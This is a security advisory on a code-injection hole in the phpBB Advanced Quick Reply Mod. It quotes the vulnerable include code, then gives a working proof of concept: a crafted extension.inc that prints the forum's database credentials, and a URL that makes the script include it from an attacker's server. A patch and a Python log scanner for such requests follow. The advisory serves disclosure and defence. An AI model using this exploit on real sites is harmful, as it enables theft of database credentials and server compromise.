Hai Nam Luke has found a security hole in the phpBB Advanced Quick Reply Mod (Code Injection). Attackers can exploit this Mod to inject PHP code into an existing forum, effectively compromising the site's integrity.

Credit:
The information has been provided by Hai Nam Luke.
Exploit:
In the file quick_reply.php you will notice the following vulnerable code:

    if ( $mode == 'smilies' )
    {
        define('IN_PHPBB', true);
        include($phpbb_root_path . 'extension.inc');
        include($phpbb_root_path . 'common.'.$phpEx);
        include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
        generate_smilies('window', PAGE_POSTING);
        exit;
    }

If you create a file called 'extension.inc' containing, for example:

    <?php
    include('config'.'.php');
    echo "DB Type: $dbms <br>";
    echo "DB Host: $dbhost <br>";
    echo "DB Name: $dbname <br>";
    echo "DB User: $dbuser <br>";
    echo "DB Pass: $dbpasswd <br>";
    exit;
    ?>

then accessing the file with the following URL:

    http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles

will return the server's database username and password.

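Patch:
In quick_reply.php, make the following change. It assigns $phpbb_root_path inside the script before the includes run, so a value supplied in the URL is overwritten.

[FIND]
    if ( $mode == 'smilies' )
    {

[ADD BEFORE]
    $phpbb_root_path = "./";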
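
Detection (added example, not part of the original advisory or of phpBB): because the patched script sets $phpbb_root_path itself, any request that supplies that parameter is worth reviewing. The Python sketch below scans web access-log lines for it and generalizes slightly beyond quick_reply.php by matching any script path; the log lines, hosts and IP addresses are constructed placeholders, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in combined log format; all hosts and IPs are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2005:13:55:36 +0000] "GET /forum/quick_reply.php?phpbb_root_path=http://files.example.net/&mode=smilies HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2005:13:56:01 +0000] "GET /forum/quick_reply.php?mode=smilies HTTP/1.1" 200 2048
203.0.113.5 - - [10/Oct/2005:13:57:12 +0000] "GET /forum/quick_reply.php?mode=smilies&phpbb%5Froot%5Fpath=%68ttp%3A%2F%2Ffiles.example.net%2F HTTP/1.1" 200 498
198.51.100.9 - - [10/Oct/2005:13:58:44 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 9000
192.0.2.33 - - [10/Oct/2005:13:59:02 +0000] "GET /forum/quick_reply.php?phpbb.root.path=./ HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
# Value that makes include() fetch from another host: scheme://... or //host/...
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
PARAM = "phpbb_root_path"


def classify(line):
    """Return None for a clean line, else a dict describing the override attempt."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    path, _, query = match.group(1).partition("?")
    # parse_qsl percent-decodes names and values, as PHP does before registering them.
    for name, value in parse_qsl(query, keep_blank_values=True):
        # PHP rewrites dots and spaces in incoming variable names to underscores.
        if name.replace(".", "_").replace(" ", "_") == PARAM:
            return {
                "client": line.split()[0],
                "path": path,
                "value": value,
                "remote": bool(REMOTE_RE.match(value.strip())),
            }
    return None


def scan(log_text):
    """Return one finding per log line that sets phpbb_root_path in the query string."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

An access log records only the query string, so this covers requests shaped like the URL shown above.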